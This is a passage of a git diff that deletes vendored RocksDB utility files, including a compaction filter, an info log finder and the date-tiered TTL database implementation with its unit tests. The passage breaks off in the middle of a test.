-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/column_aware_encoding_util.h b/thirdparty/rocksdb/utilities/column_aware_encoding_util.h
deleted file mode 100644
index 385d410..0000000
--- a/thirdparty/rocksdb/utilities/column_aware_encoding_util.h
+++ /dev/null
@@ -1,80 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-#include "db/dbformat.h"
-#include "include/rocksdb/env.h"
-#include "include/rocksdb/listener.h"
-#include "include/rocksdb/options.h"
-#include "include/rocksdb/status.h"
-#include "options/cf_options.h"
-#include "table/block_based_table_reader.h"
-
-namespace rocksdb {
-
-struct ColDeclaration;
-struct KVPairColDeclarations;
-
-class ColumnAwareEncodingReader {
- public:
-  explicit ColumnAwareEncodingReader(const std::string& file_name);
-
-  void GetKVPairsFromDataBlocks(std::vector<KVPairBlock>* kv_pair_blocks);
-
-  void EncodeBlocksToRowFormat(WritableFile* out_file,
-                               CompressionType compression_type,
-                               const std::vector<KVPairBlock>& kv_pair_blocks,
-                               std::vector<std::string>* blocks);
-
-  void DecodeBlocksFromRowFormat(WritableFile* out_file,
-                                 const std::vector<std::string>* blocks);
-
-  void DumpDataColumns(const std::string& filename,
-                       const KVPairColDeclarations& kvp_col_declarations,
-                       const std::vector<KVPairBlock>& kv_pair_blocks);
-
-  Status EncodeBlocks(const KVPairColDeclarations& kvp_col_declarations,
-                      WritableFile* out_file, CompressionType compression_type,
-                      const std::vector<KVPairBlock>& kv_pair_blocks,
-                      std::vector<std::string>* blocks, bool print_column_stat);
-
-  void DecodeBlocks(const KVPairColDeclarations& kvp_col_declarations,
-                    WritableFile* out_file,
-                    const std::vector<std::string>* blocks);
-
-  static void GetColDeclarationsPrimary(
-      std::vector<ColDeclaration>** key_col_declarations,
-      std::vector<ColDeclaration>** value_col_declarations,
-      ColDeclaration** value_checksum_declaration);
-
-  static void GetColDeclarationsSecondary(
-      std::vector<ColDeclaration>** key_col_declarations,
-      std::vector<ColDeclaration>** value_col_declarations,
-      ColDeclaration** value_checksum_declaration);
-
- private:
-  // Init the TableReader for the sst file
-  void InitTableReader(const std::string& file_path);
-
-  std::string file_name_;
-  EnvOptions soptions_;
-
-  Options options_;
-
-  Status init_result_;
-  std::unique_ptr<BlockBasedTable> table_reader_;
-  std::unique_ptr<RandomAccessFileReader> file_;
-
-  const ImmutableCFOptions ioptions_;
-  InternalKeyComparator internal_comparator_;
-  std::unique_ptr<TableProperties> table_properties_;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc b/thirdparty/rocksdb/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc
deleted file mode 100644
index 43a2529..0000000
--- a/thirdparty/rocksdb/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc
+++ /dev/null
@@ -1,30 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-
-#include "rocksdb/slice.h"
-#include "utilities/compaction_filters/remove_emptyvalue_compactionfilter.h"
-
-namespace rocksdb {
-
-const char* RemoveEmptyValueCompactionFilter::Name() const {
-  return "RemoveEmptyValueCompactionFilter";
-}
-
-bool RemoveEmptyValueCompactionFilter::Filter(int level,
-    const Slice& key,
-    const Slice& existing_value,
-    std::string* new_value,
-    bool* value_changed) const {
-
-  // remove kv pairs that have empty values
-  return existing_value.empty();
-}
-
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/compaction_filters/remove_emptyvalue_compactionfilter.h b/thirdparty/rocksdb/utilities/compaction_filters/remove_emptyvalue_compactionfilter.h
deleted file mode 100644
index b4a389b..0000000
--- a/thirdparty/rocksdb/utilities/compaction_filters/remove_emptyvalue_compactionfilter.h
+++ /dev/null
@@ -1,27 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#pragma once
-
-#include <string>
-
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-class RemoveEmptyValueCompactionFilter : public CompactionFilter {
- public:
-    const char* Name() const override;
-    bool Filter(int level,
-        const Slice& key,
-        const Slice& existing_value,
-        std::string* new_value,
-        bool* value_changed) const override;
-};
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/convenience/info_log_finder.cc b/thirdparty/rocksdb/utilities/convenience/info_log_finder.cc
deleted file mode 100644
index 72c4a62..0000000
--- a/thirdparty/rocksdb/utilities/convenience/info_log_finder.cc
+++ /dev/null
@@ -1,48 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 Facebook.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file.
-
-#include "rocksdb/utilities/info_log_finder.h"
-#include "rocksdb/env.h"
-#include "util/filename.h"
-
-namespace rocksdb {
-
-Status GetInfoLogList(DB* db, std::vector<std::string>* info_log_list) {
-  uint64_t number = 0;
-  FileType type;
-  std::string path;
-
-  if (!db) {
-    return Status::InvalidArgument("DB pointer is not valid");
-  }
-
-  const Options& options = db->GetOptions();
-  if (!options.db_log_dir.empty()) {
-    path = options.db_log_dir;
-  } else {
-    path = db->GetName();
-  }
-  InfoLogPrefix info_log_prefix(!options.db_log_dir.empty(), db->GetName());
-  auto* env = options.env;
-  std::vector<std::string> file_names;
-  Status s = env->GetChildren(path, &file_names);
-
-  if (!s.ok()) {
-    return s;
-  }
-
-  for (auto f : file_names) {
-    if (ParseFileName(f, &number, info_log_prefix.prefix, &type) &&
-        (type == kInfoLogFile)) {
-      info_log_list->push_back(f);
-    }
-  }
-  return Status::OK();
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/date_tiered/date_tiered_db_impl.cc b/thirdparty/rocksdb/utilities/date_tiered/date_tiered_db_impl.cc
deleted file mode 100644
index c1b1ceb..0000000
--- a/thirdparty/rocksdb/utilities/date_tiered/date_tiered_db_impl.cc
+++ /dev/null
@@ -1,396 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#ifndef ROCKSDB_LITE
-
-#include "utilities/date_tiered/date_tiered_db_impl.h"
-
-#include <limits>
-
-#include "db/db_impl.h"
-#include "db/db_iter.h"
-#include "db/write_batch_internal.h"
-#include "monitoring/instrumented_mutex.h"
-#include "options/options_helper.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/utilities/date_tiered_db.h"
-#include "table/merging_iterator.h"
-#include "util/coding.h"
-#include "util/filename.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-// Open the db inside DateTieredDBImpl because options needs pointer to its ttl
-DateTieredDBImpl::DateTieredDBImpl(
-    DB* db, Options options,
-    const std::vector<ColumnFamilyDescriptor>& descriptors,
-    const std::vector<ColumnFamilyHandle*>& handles, int64_t ttl,
-    int64_t column_family_interval)
-    : db_(db),
-      cf_options_(ColumnFamilyOptions(options)),
-      ioptions_(ImmutableCFOptions(options)),
-      ttl_(ttl),
-      column_family_interval_(column_family_interval),
-      mutex_(options.statistics.get(), db->GetEnv(), DB_MUTEX_WAIT_MICROS,
-             options.use_adaptive_mutex) {
-  latest_timebound_ = std::numeric_limits<int64_t>::min();
-  for (size_t i = 0; i < handles.size(); ++i) {
-    const auto& name = descriptors[i].name;
-    int64_t timestamp = 0;
-    try {
-      timestamp = ParseUint64(name);
-    } catch (const std::invalid_argument&) {
-      // Bypass unrelated column family, e.g. default
-      db_->DestroyColumnFamilyHandle(handles[i]);
-      continue;
-    }
-    if (timestamp > latest_timebound_) {
-      latest_timebound_ = timestamp;
-    }
-    handle_map_.insert(std::make_pair(timestamp, handles[i]));
-  }
-}
-
-DateTieredDBImpl::~DateTieredDBImpl() {
-  for (auto handle : handle_map_) {
-    db_->DestroyColumnFamilyHandle(handle.second);
-  }
-  delete db_;
-  db_ = nullptr;
-}
-
-Status DateTieredDB::Open(const Options& options, const std::string& dbname,
-                          DateTieredDB** dbptr, int64_t ttl,
-                          int64_t column_family_interval, bool read_only) {
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  std::vector<ColumnFamilyDescriptor> descriptors;
-  std::vector<ColumnFamilyHandle*> handles;
-  DB* db;
-  Status s;
-
-  // Get column families
-  std::vector<std::string> column_family_names;
-  s = DB::ListColumnFamilies(db_options, dbname, &column_family_names);
-  if (!s.ok()) {
-    // No column family found. Use default
-    s = DB::Open(options, dbname, &db);
-    if (!s.ok()) {
-      return s;
-    }
-  } else {
-    for (auto name : column_family_names) {
-      descriptors.emplace_back(ColumnFamilyDescriptor(name, cf_options));
-    }
-
-    // Open database
-    if (read_only) {
-      s = DB::OpenForReadOnly(db_options, dbname, descriptors, &handles, &db);
-    } else {
-      s = DB::Open(db_options, dbname, descriptors, &handles, &db);
-    }
-  }
-
-  if (s.ok()) {
-    *dbptr = new DateTieredDBImpl(db, options, descriptors, handles, ttl,
-                                  column_family_interval);
-  }
-  return s;
-}
-
-// Checks if the string is stale or not according to TTl provided
-bool DateTieredDBImpl::IsStale(int64_t keytime, int64_t ttl, Env* env) {
-  if (ttl <= 0) {
-    // Data is fresh if TTL is non-positive
-    return false;
-  }
-  int64_t curtime;
-  if (!env->GetCurrentTime(&curtime).ok()) {
-    // Treat the data as fresh if could not get current time
-    return false;
-  }
-  return curtime >= keytime + ttl;
-}
-
-// Drop column family when all data in that column family is expired
-// TODO(jhli): Can be made a background job
-Status DateTieredDBImpl::DropObsoleteColumnFamilies() {
-  int64_t curtime;
-  Status s;
-  s = db_->GetEnv()->GetCurrentTime(&curtime);
-  if (!s.ok()) {
-    return s;
-  }
-  {
-    InstrumentedMutexLock l(&mutex_);
-    auto iter = handle_map_.begin();
-    while (iter != handle_map_.end()) {
-      if (iter->first <= curtime - ttl_) {
-        s = db_->DropColumnFamily(iter->second);
-        if (!s.ok()) {
-          return s;
-        }
-        delete iter->second;
-        iter = handle_map_.erase(iter);
-      } else {
-        break;
-      }
-    }
-  }
-  return Status::OK();
-}
-
-// Get timestamp from user key
-Status DateTieredDBImpl::GetTimestamp(const Slice& key, int64_t* result) {
-  if (key.size() < kTSLength) {
-    return Status::Corruption("Bad timestamp in key");
-  }
-  const char* pos = key.data() + key.size() - 8;
-  int64_t timestamp = 0;
-  if (port::kLittleEndian) {
-    int bytes_to_fill = 8;
-    for (int i = 0; i < bytes_to_fill; ++i) {
-      timestamp |= (static_cast<uint64_t>(static_cast<unsigned char>(pos[i]))
-                    << ((bytes_to_fill - i - 1) << 3));
-    }
-  } else {
-    memcpy(&timestamp, pos, sizeof(timestamp));
-  }
-  *result = timestamp;
-  return Status::OK();
-}
-
-Status DateTieredDBImpl::CreateColumnFamily(
-    ColumnFamilyHandle** column_family) {
-  int64_t curtime;
-  Status s;
-  mutex_.AssertHeld();
-  s = db_->GetEnv()->GetCurrentTime(&curtime);
-  if (!s.ok()) {
-    return s;
-  }
-  int64_t new_timebound;
-  if (handle_map_.empty()) {
-    new_timebound = curtime + column_family_interval_;
-  } else {
-    new_timebound =
-        latest_timebound_ +
-        ((curtime - latest_timebound_) / column_family_interval_ + 1) *
-            column_family_interval_;
-  }
-  std::string cf_name = ToString(new_timebound);
-  latest_timebound_ = new_timebound;
-  s = db_->CreateColumnFamily(cf_options_, cf_name, column_family);
-  if (s.ok()) {
-    handle_map_.insert(std::make_pair(new_timebound, *column_family));
-  }
-  return s;
-}
-
-Status DateTieredDBImpl::FindColumnFamily(int64_t keytime,
-                                          ColumnFamilyHandle** column_family,
-                                          bool create_if_missing) {
-  *column_family = nullptr;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    auto iter = handle_map_.upper_bound(keytime);
-    if (iter == handle_map_.end()) {
-      if (!create_if_missing) {
-        return Status::NotFound();
-      } else {
-        return CreateColumnFamily(column_family);
-      }
-    }
-    // Move to previous element to get the appropriate time window
-    *column_family = iter->second;
-  }
-  return Status::OK();
-}
-
-Status DateTieredDBImpl::Put(const WriteOptions& options, const Slice& key,
-                             const Slice& val) {
-  int64_t timestamp = 0;
-  Status s;
-  s = GetTimestamp(key, &timestamp);
-  if (!s.ok()) {
-    return s;
-  }
-  DropObsoleteColumnFamilies();
-
-  // Prune request to obsolete data
-  if (IsStale(timestamp, ttl_, db_->GetEnv())) {
-    return Status::InvalidArgument();
-  }
-
-  // Decide column family (i.e. the time window) to put into
-  ColumnFamilyHandle* column_family;
-  s = FindColumnFamily(timestamp, &column_family, true /*create_if_missing*/);
-  if (!s.ok()) {
-    return s;
-  }
-
-  // Efficiently put with WriteBatch
-  WriteBatch batch;
-  batch.Put(column_family, key, val);
-  return Write(options, &batch);
-}
-
-Status DateTieredDBImpl::Get(const ReadOptions& options, const Slice& key,
-                             std::string* value) {
-  int64_t timestamp = 0;
-  Status s;
-  s = GetTimestamp(key, &timestamp);
-  if (!s.ok()) {
-    return s;
-  }
-  // Prune request to obsolete data
-  if (IsStale(timestamp, ttl_, db_->GetEnv())) {
-    return Status::NotFound();
-  }
-
-  // Decide column family to get from
-  ColumnFamilyHandle* column_family;
-  s = FindColumnFamily(timestamp, &column_family, false /*create_if_missing*/);
-  if (!s.ok()) {
-    return s;
-  }
-  if (column_family == nullptr) {
-    // Cannot find column family
-    return Status::NotFound();
-  }
-
-  // Get value with key
-  return db_->Get(options, column_family, key, value);
-}
-
-bool DateTieredDBImpl::KeyMayExist(const ReadOptions& options, const Slice& key,
-                                   std::string* value, bool* value_found) {
-  int64_t timestamp = 0;
-  Status s;
-  s = GetTimestamp(key, &timestamp);
-  if (!s.ok()) {
-    // Cannot get current time
-    return false;
-  }
-  // Decide column family to get from
-  ColumnFamilyHandle* column_family;
-  s = FindColumnFamily(timestamp, &column_family, false /*create_if_missing*/);
-  if (!s.ok() || column_family == nullptr) {
-    // Cannot find column family
-    return false;
-  }
-  if (IsStale(timestamp, ttl_, db_->GetEnv())) {
-    return false;
-  }
-  return db_->KeyMayExist(options, column_family, key, value, value_found);
-}
-
-Status DateTieredDBImpl::Delete(const WriteOptions& options, const Slice& key) {
-  int64_t timestamp = 0;
-  Status s;
-  s = GetTimestamp(key, &timestamp);
-  if (!s.ok()) {
-    return s;
-  }
-  DropObsoleteColumnFamilies();
-  // Prune request to obsolete data
-  if (IsStale(timestamp, ttl_, db_->GetEnv())) {
-    return Status::NotFound();
-  }
-
-  // Decide column family to get from
-  ColumnFamilyHandle* column_family;
-  s = FindColumnFamily(timestamp, &column_family, false /*create_if_missing*/);
-  if (!s.ok()) {
-    return s;
-  }
-  if (column_family == nullptr) {
-    // Cannot find column family
-    return Status::NotFound();
-  }
-
-  // Get value with key
-  return db_->Delete(options, column_family, key);
-}
-
-Status DateTieredDBImpl::Merge(const WriteOptions& options, const Slice& key,
-                               const Slice& value) {
-  // Decide column family to get from
-  int64_t timestamp = 0;
-  Status s;
-  s = GetTimestamp(key, &timestamp);
-  if (!s.ok()) {
-    // Cannot get current time
-    return s;
-  }
-  ColumnFamilyHandle* column_family;
-  s = FindColumnFamily(timestamp, &column_family, true /*create_if_missing*/);
-  if (!s.ok()) {
-    return s;
-  }
-  WriteBatch batch;
-  batch.Merge(column_family, key, value);
-  return Write(options, &batch);
-}
-
-Status DateTieredDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) {
-  class Handler : public WriteBatch::Handler {
-   public:
-    explicit Handler() {}
-    WriteBatch updates_ttl;
-    Status batch_rewrite_status;
-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) override {
-      WriteBatchInternal::Put(&updates_ttl, column_family_id, key, value);
-      return Status::OK();
-    }
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& value) override {
-      WriteBatchInternal::Merge(&updates_ttl, column_family_id, key, value);
-      return Status::OK();
-    }
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      WriteBatchInternal::Delete(&updates_ttl, column_family_id, key);
-      return Status::OK();
-    }
-    virtual void LogData(const Slice& blob) override {
-      updates_ttl.PutLogData(blob);
-    }
-  };
-  Handler handler;
-  updates->Iterate(&handler);
-  if (!handler.batch_rewrite_status.ok()) {
-    return handler.batch_rewrite_status;
-  } else {
-    return db_->Write(opts, &(handler.updates_ttl));
-  }
-}
-
-Iterator* DateTieredDBImpl::NewIterator(const ReadOptions& opts) {
-  if (handle_map_.empty()) {
-    return NewEmptyIterator();
-  }
-
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db_);
-
-  auto db_iter = NewArenaWrappedDbIterator(
-      db_impl->GetEnv(), opts, ioptions_, kMaxSequenceNumber,
-      cf_options_.max_sequential_skip_in_iterations, 0);
-
-  auto arena = db_iter->GetArena();
-  MergeIteratorBuilder builder(cf_options_.comparator, arena);
-  for (auto& item : handle_map_) {
-    auto handle = item.second;
-    builder.AddIterator(db_impl->NewInternalIterator(
-        arena, db_iter->GetRangeDelAggregator(), handle));
-  }
-  auto internal_iter = builder.Finish();
-  db_iter->SetIterUnderDBIter(internal_iter);
-  return db_iter;
-}
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/date_tiered/date_tiered_db_impl.h b/thirdparty/rocksdb/utilities/date_tiered/date_tiered_db_impl.h
deleted file mode 100644
index 2236cff..0000000
--- a/thirdparty/rocksdb/utilities/date_tiered/date_tiered_db_impl.h
+++ /dev/null
@@ -1,89 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <map>
-#include <string>
-#include <vector>
-
-#include "monitoring/instrumented_mutex.h"
-#include "options/cf_options.h"
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/date_tiered_db.h"
-
-namespace rocksdb {
-
-// Implementation of DateTieredDB.
-class DateTieredDBImpl : public DateTieredDB {
- public:
-  DateTieredDBImpl(DB* db, Options options,
-                   const std::vector<ColumnFamilyDescriptor>& descriptors,
-                   const std::vector<ColumnFamilyHandle*>& handles, int64_t ttl,
-                   int64_t column_family_interval);
-
-  virtual ~DateTieredDBImpl();
-
-  Status Put(const WriteOptions& options, const Slice& key,
-             const Slice& val) override;
-
-  Status Get(const ReadOptions& options, const Slice& key,
-             std::string* value) override;
-
-  Status Delete(const WriteOptions& options, const Slice& key) override;
-
-  bool KeyMayExist(const ReadOptions& options, const Slice& key,
-                   std::string* value, bool* value_found = nullptr) override;
-
-  Status Merge(const WriteOptions& options, const Slice& key,
-               const Slice& value) override;
-
-  Iterator* NewIterator(const ReadOptions& opts) override;
-
-  Status DropObsoleteColumnFamilies() override;
-
-  // Extract timestamp from key.
-  static Status GetTimestamp(const Slice& key, int64_t* result);
-
- private:
-  // Base database object
-  DB* db_;
-
-  const ColumnFamilyOptions cf_options_;
-
-  const ImmutableCFOptions ioptions_;
-
-  // Storing all column family handles for time series data.
-  std::vector<ColumnFamilyHandle*> handles_;
-
-  // Manages a mapping from a column family's maximum timestamp to its handle.
-  std::map<int64_t, ColumnFamilyHandle*> handle_map_;
-
-  // A time-to-live value to indicate when the data should be removed.
-  int64_t ttl_;
-
-  // An variable to indicate the time range of a column family.
-  int64_t column_family_interval_;
-
-  // Indicate largest maximum timestamp of a column family.
-  int64_t latest_timebound_;
-
-  // Mutex to protect handle_map_ operations.
-  InstrumentedMutex mutex_;
-
-  // Internal method to execute Put and Merge in batch.
-  Status Write(const WriteOptions& opts, WriteBatch* updates);
-
-  Status CreateColumnFamily(ColumnFamilyHandle** column_family);
-
-  Status FindColumnFamily(int64_t keytime, ColumnFamilyHandle** column_family,
-                          bool create_if_missing);
-
-  static bool IsStale(int64_t keytime, int64_t ttl, Env* env);
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/date_tiered/date_tiered_test.cc b/thirdparty/rocksdb/utilities/date_tiered/date_tiered_test.cc
deleted file mode 100644
index 55e3f62..0000000
--- a/thirdparty/rocksdb/utilities/date_tiered/date_tiered_test.cc
+++ /dev/null
@@ -1,468 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#ifndef OS_WIN
-#include <unistd.h>
-#endif
-
-#include <map>
-#include <memory>
-
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/utilities/date_tiered_db.h"
-#include "util/logging.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-namespace {
-
-typedef std::map<std::string, std::string> KVMap;
-}
-
-class SpecialTimeEnv : public EnvWrapper {
- public:
-  explicit SpecialTimeEnv(Env* base) : EnvWrapper(base) {
-    base->GetCurrentTime(&current_time_);
-  }
-
-  void Sleep(int64_t sleep_time) { current_time_ += sleep_time; }
-  virtual Status GetCurrentTime(int64_t* current_time) override {
-    *current_time = current_time_;
-    return Status::OK();
-  }
-
- private:
-  int64_t current_time_ = 0;
-};
-
-class DateTieredTest : public testing::Test {
- public:
-  DateTieredTest() {
-    env_.reset(new SpecialTimeEnv(Env::Default()));
-    dbname_ = test::TmpDir() + "/date_tiered";
-    options_.create_if_missing = true;
-    options_.env = env_.get();
-    date_tiered_db_.reset(nullptr);
-    DestroyDB(dbname_, Options());
-  }
-
-  ~DateTieredTest() {
-    CloseDateTieredDB();
-    DestroyDB(dbname_, Options());
-  }
-
-  void OpenDateTieredDB(int64_t ttl, int64_t column_family_interval,
-                        bool read_only = false) {
-    ASSERT_TRUE(date_tiered_db_.get() == nullptr);
-    DateTieredDB* date_tiered_db = nullptr;
-    ASSERT_OK(DateTieredDB::Open(options_, dbname_, &date_tiered_db, ttl,
-                                 column_family_interval, read_only));
-    date_tiered_db_.reset(date_tiered_db);
-  }
-
-  void CloseDateTieredDB() { date_tiered_db_.reset(nullptr); }
-
-  Status AppendTimestamp(std::string* key) {
-    char ts[8];
-    int bytes_to_fill = 8;
-    int64_t timestamp_value = 0;
-    Status s = env_->GetCurrentTime(&timestamp_value);
-    if (!s.ok()) {
-      return s;
-    }
-    if (port::kLittleEndian) {
-      for (int i = 0; i < bytes_to_fill; ++i) {
-        ts[i] = (timestamp_value >> ((bytes_to_fill - i - 1) << 3)) & 0xFF;
-      }
-    } else {
-      memcpy(ts, static_cast<void*>(&timestamp_value), bytes_to_fill);
-    }
-    key->append(ts, 8);
-    return Status::OK();
-  }
-
-  // Populates and returns a kv-map
-  void MakeKVMap(int64_t num_entries, KVMap* kvmap) {
-    kvmap->clear();
-    int digits = 1;
-    for (int64_t dummy = num_entries; dummy /= 10; ++digits) {
-    }
-    int digits_in_i = 1;
-    for (int64_t i = 0; i < num_entries; i++) {
-      std::string key = "key";
-      std::string value = "value";
-      if (i % 10 == 0) {
-        digits_in_i++;
-      }
-      for (int j = digits_in_i; j < digits; j++) {
-        key.append("0");
-        value.append("0");
-      }
-      AppendNumberTo(&key, i);
-      AppendNumberTo(&value, i);
-      ASSERT_OK(AppendTimestamp(&key));
-      (*kvmap)[key] = value;
-    }
-    // check all insertions done
-    ASSERT_EQ(num_entries, static_cast<int64_t>(kvmap->size()));
-  }
-
-  size_t GetColumnFamilyCount() {
-    DBOptions db_options(options_);
-    std::vector<std::string> cf;
-    DB::ListColumnFamilies(db_options, dbname_, &cf);
-    return cf.size();
-  }
-
-  void Sleep(int64_t sleep_time) { env_->Sleep(sleep_time); }
-
-  static const int64_t kSampleSize_ = 100;
-  std::string dbname_;
-  std::unique_ptr<DateTieredDB> date_tiered_db_;
-  std::unique_ptr<SpecialTimeEnv> env_;
-  KVMap kvmap_;
-
- private:
-  Options options_;
-  KVMap::iterator kv_it_;
-  const std::string kNewValue_ = "new_value";
-  unique_ptr<CompactionFilter> test_comp_filter_;
-};
-
-// Puts a set of values and checks its presence using Get during ttl
-TEST_F(DateTieredTest, KeyLifeCycle) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(2, 2);
-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-
-  // Create key value pairs to insert
-  KVMap map_insert;
-  MakeKVMap(kSampleSize_, &map_insert);
-
-  // Put data in database
-  for (auto& kv : map_insert) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-
-  Sleep(1);
-  // T=1, keys should still reside in database
-  for (auto& kv : map_insert) {
-    std::string value;
-    ASSERT_OK(date_tiered_db_->Get(ropts, kv.first, &value));
-    ASSERT_EQ(value, kv.second);
-  }
-
-  Sleep(1);
-  // T=2, keys should not be retrieved
-  for (auto& kv : map_insert) {
-    std::string value;
-    auto s = date_tiered_db_->Get(ropts, kv.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-
-  CloseDateTieredDB();
-}
-
-TEST_F(DateTieredTest, DeleteTest) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(2, 2);
-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-
-  // Create key value pairs to insert
-  KVMap map_insert;
-  MakeKVMap(kSampleSize_, &map_insert);
-
-  // Put data in database
-  for (auto& kv : map_insert) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-
-  Sleep(1);
-  // Delete keys when they are not obsolete
-  for (auto& kv : map_insert) {
-    ASSERT_OK(date_tiered_db_->Delete(wopts, kv.first));
-  }
-
-  // Key should not be found
-  for (auto& kv : map_insert) {
-    std::string value;
-    auto s = date_tiered_db_->Get(ropts, kv.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-}
-
-TEST_F(DateTieredTest, KeyMayExistTest) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(2, 2);
-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-
-  // Create key value pairs to insert
-  KVMap map_insert;
-  MakeKVMap(kSampleSize_, &map_insert);
-
-  // Put data in database
-  for (auto& kv : map_insert) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-
-  Sleep(1);
-  // T=1, keys should still reside in database
-  for (auto& kv : map_insert) {
-    std::string value;
-    ASSERT_TRUE(date_tiered_db_->KeyMayExist(ropts, kv.first, &value));
-    ASSERT_EQ(value, kv.second);
-  }
-}
-
-// Database open and close should not affect
-TEST_F(DateTieredTest, MultiOpen) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(4, 4);
-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-
-  // Create key value pairs to insert
-  KVMap map_insert;
-  MakeKVMap(kSampleSize_, &map_insert);
-
-  // Put data in database
-  for (auto& kv : map_insert) {
-    ASSERT_OK(date_tiered_db_->Put(wopts, kv.first, kv.second));
-  }
-  CloseDateTieredDB();
-
-  Sleep(1);
-  OpenDateTieredDB(2, 2);
-  // T=1, keys should still reside in database
-  for (auto& kv : map_insert) {
-    std::string value;
-    ASSERT_OK(date_tiered_db_->Get(ropts, kv.first, &value));
-    ASSERT_EQ(value, kv.second);
-  }
-
-  Sleep(1);
-  // T=2, keys should not be retrieved
-  for (auto& kv : map_insert) {
-    std::string value;
-    auto s = date_tiered_db_->Get(ropts, kv.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-
-  CloseDateTieredDB();
-}
-
-// If the key in Put() is obsolete, the data should not be written into database
-TEST_F(DateTieredTest, InsertObsoleteDate) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(2, 2);
-  ASSERT_TRUE(date_tiered_db_.get() != nullptr);
-
-  // Create key value pairs to insert
-  KVMap map_insert;
-  MakeKVMap(kSampleSize_, &map_insert);
-
-  Sleep(2);
-  // T=2, keys put into database are already obsolete
-  // Put data in database. Operations should not return OK
-  for (auto& kv : map_insert) {
-    auto s = date_tiered_db_->Put(wopts, kv.first, kv.second);
-    ASSERT_TRUE(s.IsInvalidArgument());
-  }
-
-  // Data should not be found in database
-  for (auto& kv : map_insert) {
-    std::string value;
-    auto s = date_tiered_db_->Get(ropts, kv.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-
-  CloseDateTieredDB();
-}
-
-// Resets the timestamp of a set of kvs by updating them and checks that they
-// are not deleted according to the old timestamp
-TEST_F(DateTieredTest, ColumnFamilyCounts) {
-  WriteOptions wopts;
-  ReadOptions ropts;
-
-  // T=0, open the database and insert data
-  OpenDateTieredDB(4, 2);
